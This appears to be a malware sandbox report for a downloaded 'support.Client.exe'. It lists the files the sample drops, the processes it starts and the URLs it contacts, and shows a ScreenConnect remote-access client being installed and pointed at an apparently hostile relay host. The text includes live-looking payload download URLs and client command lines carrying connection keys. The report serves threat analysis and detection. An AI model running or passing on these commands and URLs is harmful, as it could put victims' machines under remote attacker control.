Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
C:\ProgramData\Microsoft\Network\Downloader\edb.log
|
data
|
dropped
|
||
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
|
Extensible storage engine DataBase, version 0x620, checksum 0x28b44850, page size 16384, DirtyShutdown, Windows version 10.0
|
dropped
|
||
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
|
data
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
|
Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks,
0x1 compression
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8EC9B1D0ABBD7F98B401D425828828CE_BE4413523710330F97BEE5D4A544C42B
|
data
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141
|
data
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2E248BEDDBB2D85122423C41028BFD4
|
Certificate, Version=3
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157
|
data
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
|
data
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8EC9B1D0ABBD7F98B401D425828828CE_BE4413523710330F97BEE5D4A544C42B
|
data
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141
|
data
|
dropped
|
||
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2E248BEDDBB2D85122423C41028BFD4
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\manifests\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445.cdf-ms
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\manifests\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445.manifest
|
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (10074), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\manifests\scre..core_4b14c015c87c1ad8_0017.0009_none_65cb6507f0c2a5b9.cdf-ms
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\manifests\scre..core_4b14c015c87c1ad8_0017.0009_none_65cb6507f0c2a5b9.manifest
|
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\manifests\scre..dows_4b14c015c87c1ad8_0017.0009_none_6a433ce92d10b8e9.cdf-ms
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\manifests\scre..dows_4b14c015c87c1ad8_0017.0009_none_6a433ce92d10b8e9.manifest
|
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\manifests\scre..ient_4b14c015c87c1ad8_0017.0009_none_c7123e2bd9a688c6.cdf-ms
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\manifests\scre..ient_4b14c015c87c1ad8_0017.0009_none_c7123e2bd9a688c6.manifest
|
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\manifests\scre..ient_4b14c015c87c1ad8_0017.0009_none_fbe0c2da0011fbbd.cdf-ms
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\manifests\scre..ient_4b14c015c87c1ad8_0017.0009_none_fbe0c2da0011fbbd.manifest
|
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\manifests\scre..tion_25b0fbb6ef7eb094_0017.0009_none_4b563d129b766e28.cdf-ms
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\manifests\scre..tion_25b0fbb6ef7eb094_0017.0009_none_4b563d129b766e28.manifest
|
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (63847), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\manifests\scre..vice_4b14c015c87c1ad8_0017.0009_none_171efd5086820924.cdf-ms
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\manifests\scre..vice_4b14c015c87c1ad8_0017.0009_none_171efd5086820924.manifest
|
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445\ScreenConnect.ClientService.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445\ScreenConnect.WindowsBackstageShell.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445\ScreenConnect.WindowsBackstageShell.exe.config
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445\ScreenConnect.WindowsClient.exe.config
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445\ScreenConnect.WindowsFileManager.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445\ScreenConnect.WindowsFileManager.exe.config
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..core_4b14c015c87c1ad8_0017.0009_none_65cb6507f0c2a5b9\ScreenConnect.Core.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..dows_4b14c015c87c1ad8_0017.0009_none_6a433ce92d10b8e9\ScreenConnect.Windows.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..ient_4b14c015c87c1ad8_0017.0009_none_c7123e2bd9a688c6\ScreenConnect.WindowsClient.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..ient_4b14c015c87c1ad8_0017.0009_none_c7123e2bd9a688c6\ScreenConnect.WindowsClient.exe:Zone.Identifier
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..ient_4b14c015c87c1ad8_0017.0009_none_fbe0c2da0011fbbd\ScreenConnect.Client.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\4ta5r3hc.newcfg
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\Client.Override.en-US.resources
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\Client.Override.resources
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\Client.en-US.resources
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\Client.resources
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\app.config
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\user.config
(copy)
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\web.config
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..vice_4b14c015c87c1ad8_0017.0009_none_171efd5086820924\ScreenConnect.ClientService.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\AN5UOLP8\C7EOHWRV.log
|
Unicode text, UTF-16, little-endian text, with very long lines (618), with CRLF line terminators
|
modified
|
||
C:\Users\user\AppData\Local\Temp\Deployment\NNEWXDXK.2NA\YR49AVEQ.H9P.application
|
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (63847), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.Client.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.Client.dll.genman
|
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.ClientService.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.ClientService.dll.genman
|
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.ClientService.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.Core.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.Core.dll.genman
|
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.Windows.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.Windows.dll.genman
|
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.WindowsBackstageShell.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.WindowsBackstageShell.exe.config
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.WindowsClient.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.WindowsClient.exe.config
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.WindowsClient.exe.genman
|
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.WindowsClient.exe.manifest
|
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (10074), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.WindowsClient.exe:Zone.Identifier
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.WindowsFileManager.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.WindowsFileManager.exe.config
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\932a2db58c237abd381d22df4c63a04a_9e146be9-c76a-4720-bcdb-53011b87bd06
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command
line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Oct 29 17:34:05 2024, atime=Wed Sep 27 04:28:28
2023, length=1210144, window=hide
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command
line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Oct 29 17:34:05 2024, atime=Wed Sep 27 04:28:28
2023, length=1210144, window=hide
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command
line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28
2023, length=1210144, window=hide
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command
line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Oct 29 17:34:05 2024, atime=Wed Sep 27 04:28:28
2023, length=1210144, window=hide
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command
line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Oct 29 17:34:05 2024, atime=Wed Sep 27 04:28:28
2023, length=1210144, window=hide
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command
line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Oct 29 17:34:05 2024, atime=Wed Sep 27 04:28:28
2023, length=1210144, window=hide
|
dropped
|
||
C:\Users\user\Downloads\Unconfirmed 974768.crdownload
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\Users\user\Downloads\bfb7a509-8b20-4376-b9ba-bfeeb014e662.tmp
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\Users\user\Downloads\support.Client.exe (copy)
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
|
JSON data
|
dropped
|
||
C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\MpCmdRun.log
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
modified
|
||
C:\Windows\System32\user.config
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
Chrome Cache Entry: 128
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
downloaded
|
There are 71 hidden files, click here to show them.
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Windows\System32\svchost.exe
|
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
|
||
C:\Windows\System32\svchost.exe
|
C:\Windows\System32\svchost.exe -k NetworkService -p
|
||
C:\Windows\System32\svchost.exe
|
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
|
||
C:\Windows\System32\svchost.exe
|
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
|
||
C:\Windows\System32\svchost.exe
|
C:\Windows\system32\svchost.exe -k UnistackSvcGroup
|
||
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe
|
"C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe"
|
||
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exe
|
"C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exe"
"?e=Support&y=Guest&h=cp3back96.site&p=8041&s=5999b697-2fc8-47f6-a1dc-4d0d274c363e&k=BgIAAACkAABSU0ExAAgAAAEAAQB9zMUOcnsRaC12buOM5jB%2f0aQdWfMpUKDaWi13yRXoM16W00nLl4p0ZtEhANoxvmcw0wWFEBncKj1h1Sizr06d2epn5Y1la%2fZuAUNQxVB6zV6MkV%2fQ3PQ8O4IKEUzM%2b1uTT6bVi8cjhVOM7wlYYJcudQAB6Dwlh4JaUc5YEBvhT8MaZnAIYPqnbmxNwUw1RDlaRh5YJbZGPTJPIJpusdEO4D%2fCUtP6CZ%2f6LBYCi1k6apr4NFJdoCsgYMmz0ueWApW6fnSWePa0E3G6vxJQsjXUZXU7nn2pC9y84o5L0uqvKTZ239UPNomZv8wnSyaubzULL%2b48fuhT%2fYi9ukTBmorR&r=&i=Untitled%20Session"
"1"
|
||
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exe
|
"C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exe"
"?e=Support&y=Guest&h=cp3back96.site&p=8041&s=5999b697-2fc8-47f6-a1dc-4d0d274c363e&k=BgIAAACkAABSU0ExAAgAAAEAAQB9zMUOcnsRaC12buOM5jB%2f0aQdWfMpUKDaWi13yRXoM16W00nLl4p0ZtEhANoxvmcw0wWFEBncKj1h1Sizr06d2epn5Y1la%2fZuAUNQxVB6zV6MkV%2fQ3PQ8O4IKEUzM%2b1uTT6bVi8cjhVOM7wlYYJcudQAB6Dwlh4JaUc5YEBvhT8MaZnAIYPqnbmxNwUw1RDlaRh5YJbZGPTJPIJpusdEO4D%2fCUtP6CZ%2f6LBYCi1k6apr4NFJdoCsgYMmz0ueWApW6fnSWePa0E3G6vxJQsjXUZXU7nn2pC9y84o5L0uqvKTZ239UPNomZv8wnSyaubzULL%2b48fuhT%2fYi9ukTBmorR&r=&i=Untitled%20Session"
"1"
|
||
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe
|
"C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe"
"RunRole" "286148cd-317c-42bd-b1b6-847f55f60348" "User"
|
||
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe
|
"C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe"
"RunRole" "dab60135-edfb-4837-8e58-b67bfb3544e3" "System"
|
||
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
|
||
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US
--service-sandbox-type=none --mojo-platform-channel-handle=2168 --field-trial-handle=1956,i,12778889090336067455,703406671093003371,262144
--disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction
/prefetch:8
|
||
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://cp9856.chelokipotlester.icu/Bin/support.Client.exe?h=cp3back96.site&p=8041&k=BgIAAACkAABSU0ExAAgAAAEAAQB9zMUOcnsRaC12buOM5jB%2F0aQdWfMpUKDaWi13yRXoM16W00nLl4p0ZtEhANoxvmcw0wWFEBncKj1h1Sizr06d2epn5Y1la%2FZuAUNQxVB6zV6MkV%2FQ3PQ8O4IKEUzM%2B1uTT6bVi8cjhVOM7wlYYJcudQAB6Dwlh4JaUc5YEBvhT8MaZnAIYPqnbmxNwUw1RDlaRh5YJbZGPTJPIJpusdEO4D%2FCUtP6CZ%2F6LBYCi1k6apr4NFJdoCsgYMmz0ueWApW6fnSWePa0E3G6vxJQsjXUZXU7nn2pC9y84o5L0uqvKTZ239UPNomZv8wnSyaubzULL%2B48fuhT%2FYi9ukTBmorR&s=5999b697-2fc8-47f6-a1dc-4d0d274c363e&i=Untitled%20Session&e=Support&y=Guest&r="
|
||
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US
--service-sandbox-type=icon_reader --mojo-platform-channel-handle=5668 --field-trial-handle=1956,i,12778889090336067455,703406671093003371,262144
--disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction
/prefetch:8
|
||
C:\Windows\System32\SgrmBroker.exe
|
C:\Windows\system32\SgrmBroker.exe
|
||
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US
--service-sandbox-type=icon_reader --mojo-platform-channel-handle=3360 --field-trial-handle=1956,i,12778889090336067455,703406671093003371,262144
--disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction
/prefetch:8
|
||
C:\Users\user\Downloads\support.Client.exe
|
"C:\Users\user\Downloads\support.Client.exe"
|
||
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
|
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
|
||
C:\Program Files\Windows Defender\MpCmdRun.exe
|
"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\rundll32.exe
|
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6}
-Embedding
|
There are 11 hidden processes, click here to show them.
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
https://cp9856.chelokipotlester.icu/Bin/support.Client.exe?h=cp3back96.site&p=8041&k=BgIAAACkAABSU0ExAAgAAAEAAQB9zMUOcnsRaC12buOM5jB%2F0aQdWfMpUKDaWi13yRXoM16W00nLl4p0ZtEhANoxvmcw0wWFEBncKj1h1Sizr06d2epn5Y1la%2FZuAUNQxVB6zV6MkV%2FQ3PQ8O4IKEUzM%2B1uTT6bVi8cjhVOM7wlYYJcudQAB6Dwlh4JaUc5YEBvhT8MaZnAIYPqnbmxNwUw1RDlaRh5YJbZGPTJPIJpusdEO4D%2FCUtP6CZ%2F6LBYCi1k6apr4NFJdoCsgYMmz0ueWApW6fnSWePa0E3G6vxJQsjXUZXU7nn2pC9y84o5L0uqvKTZ239UPNomZv8wnSyaubzULL%2B48fuhT%2FYi9ukTBmorR&s=5999b697-2fc8-47f6-a1dc-4d0d274c363e&i=Untitled%20Session&e=Support&y=Guest&r=
|
|||
https://cp9856.chelokipotl
|
unknown
|
||
https://cp9856.chelokipotlester.icu
|
unknown
|
||
https://dev.ditu.live.com/REST/v1/Routes/
|
unknown
|
||
https://t0.ssl.ak.dynamic.tiles.virtualearth.x
|
unknown
|
||
https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.WindowsClient.exe.config
|
37.221.67.19
|
||
https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.
|
unknown
|
||
https://dev.virtualearth.net/REST/v1/Routes/Walking
|
unknown
|
||
http://www.fontbureau.com/designers
|
unknown
|
||
http://wl3.org/2000/0mldsig#sha1o
|
unknown
|
||
https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.ClientService.dll
|
37.221.67.19
|
||
http://www.sajatypeworks.com
|
unknown
|
||
https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
|
unknown
|
||
http://wk3.org/2000/0pldsig#sha1qs
|
unknown
|
||
http://www.founder.com.cn/cn/cThe
|
unknown
|
||
https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.WindowsBackstageShell.ex
|
unknown
|
||
https://dev.virtualearth.net/REST/v1/Transit/Schedules/
|
unknown
|
||
http://www.galapagosdesign.com/DPlease
|
unknown
|
||
